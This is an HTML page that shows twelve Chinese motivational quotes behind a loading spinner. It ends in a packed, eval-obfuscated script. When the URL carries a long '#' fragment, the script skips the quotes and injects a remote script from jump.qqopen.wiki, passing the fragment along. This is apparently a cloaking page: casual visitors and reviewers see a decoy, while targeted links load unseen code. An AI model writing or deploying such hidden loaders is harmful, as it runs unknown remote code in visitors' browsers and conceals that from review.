<!DOCTYPE html>
<html xmlns:th="https://www.thymeleaf.org">
<head>
    <meta charset="UTF-8">
    <title>加载中...</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name='viewport' content='initial-scale=1, maximum-scale=1'>
    <meta name='viewport' content='width=device-width,initial-scale=1,user-scalable=0'>
    <meta name="keywords" content=""/>
    <meta name="description" content=""/>
    <link rel="icon" href="data:image/ico;base64,aWNv">
    <style>
	body{width:100%;height:100%;margin:0;text-align:center}
	.load{border:16px solid #f3f3f3;border-radius:50%;border-top:16px solid blue;border-bottom:16px solid blue;width:80px;height:80px;-webkit-animation:spin 2s linear infinite;animation:spin 2s linear infinite;margin:140px auto}
	@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}
	@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}
	p{font-size: 18px;padding: 2px 20px;text-align: left;}
	</style>
</head>

<body>

  <div id="load" class="load"></div>
  
  <div id="articlelist" style='display:none'>
  <h3>简短正能量语录，句句积极向上！</h3>
   <p>一、星光不问赶路人，时光不负有心人。 </p>

 <p>二、人生共有三天：昨天今天明天。昨天已经过去，明天还没到来，我们只有把握今天，珍惜今天，才能为人生增添光辉。 </p>
 

 <p>三、一眼就能看得到头，不是我们想要的生活，我们为之努力，不是为了飞黄腾达，睥睨群雄，而是努力让自己的生活多一种可能，给自己的未来多一份惊喜。 </p>
 
  <p>四、有谁的幸运，凭空而来，只有当你足够努力，你才会足够幸运。这世界不会辜负每一份努力和坚持。时光不会怠慢执着而勇敢的每一个人！ </p>
 <p>五、不要质疑你的付出，这些都会一种累积一种沉淀，它们会默默铺路，只为让你成为更优秀的人。 </p>

 <p>六、生活总是让我们遍体鳞伤，但请相信，你今天受的苦，吃的亏，担的责，扛的罪，忍的痛，到最后都会变成光，照亮你的路。 </p>
 <p> 七、你现在所经历的寒冬，看似沉寂，实则暗潮涌动。一切生长拔节都在沉默中进行，你只需要努力生长，时间会带你去你最想要去的地方。</p>

 <p>八、好好活着，不好抱怨生活，就算生活的不如意，就算生活在最底层，一无所有又如何，毕竟你还活着，还拥有自我，这已是最大的幸运！</p>

 <p>九、我们活着不能与草木同腐，不能醉生梦死，枉度人生，要有所作为。——方志敏</p>
 <p> 十、与其担心未来，不如努力现在。成功的路上，只有奋斗才能给自己安全感。不要轻易把梦想寄托在某个人身上，也不要太在乎身旁的耳语，因为未来是你自己的，只有你自己能给自己最大的安全感。</p>

 <p>十一、你多学一样本事，就少说一句求人的话，现在的努力，是为了以后的不求别人，实力是最强的底气。记住，活着不是靠泪水博得同情，而是靠汗水赢得掌声。</p>

 <p>十二、现在过的每一天，都是余生中最年轻的一天。请不要老得太快，却明白得太迟。每天给自己一个希望，试着不为明天而烦恼，不为昨天而叹息，只为今天更美好。</p>
 
  </div>

 </body>
<script>
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[3-9a-h]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 s=location.href;8(s){7 i=s.indexOf(\'#\');8(i==-1){3.4(\'9\').5.6=\'\';3.a=\'简短正能量语录，句句积极向上！\';3.4(\'b\').5.6=\'c\'}d{7 p=s.substr(i+2);8(p.f==0||p.f<32){3.4(\'9\').5.6=\'\';3.a=\'简短正能量语录，句句积极向上！\';3.4(\'b\').5.6=\'c\'}d{(function(){7 e=3.createElement("g");e.src="http://h.qqopen.wiki/h/follow.js?p="+p;7 s=3.getElementsByTagName("g")[0];s.parentNode.insertBefore(e,s)})()}}}d{3.4(\'9\').5.6=\'\';3.a=\'简短正能量语录，句句积极向上！\';3.4(\'b\').5.6=\'c\'}',[],18,'|||document|getElementById|style|display|var|if|articlelist|title|load|none|else|hm|length|script|jump'.split('|'),0,{}))
</script>
</html>
